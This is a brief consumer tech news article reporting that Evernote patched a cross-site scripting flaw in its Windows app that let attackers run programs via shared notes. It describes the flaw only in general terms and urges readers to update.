Evernote just patched a serious XSS flaw, make sure you’re updated

Jonny Caldwell

A major security flaw has just been patched for Evernote for Windows devices. The security vulnerability allows hackers to run programs remotely by sharing a note with a user which contains malicious code.

To be a little more technical, the hack used two types of cross-site scripting (XSS) vulnerabilities, with the first type allowing a hacker to change seemingly legitimate links to download malicious executable code. The second type of vulnerability links to another webpage that contains embedded malicious code injected into user-supplied data such as that used in a contact form which is executed as soon as the page is loaded.

The hacker can exploit either one of these XSS vulnerabilities by sharing a note in any form of communication, such as email, to bait users into clicking and finding the code. Sophos’s Naked Security blog goes a lot more in-depth about how exactly this works and how it was discovered.

Luckily, anyone running Windows can update to the latest version by clicking our download link below, and clicking Update (or Install if the app isn’t already installed).

Evernote also recently received a new templates feature last month, so perhaps the security flaw will be overlooked by consumers who already use the app as their primary place for jotting information down.

Do you use Evernote or do you find Microsoft’s OneNote a better alternative? Let us know in the comments below.

Developer: Evernote
Price: Free+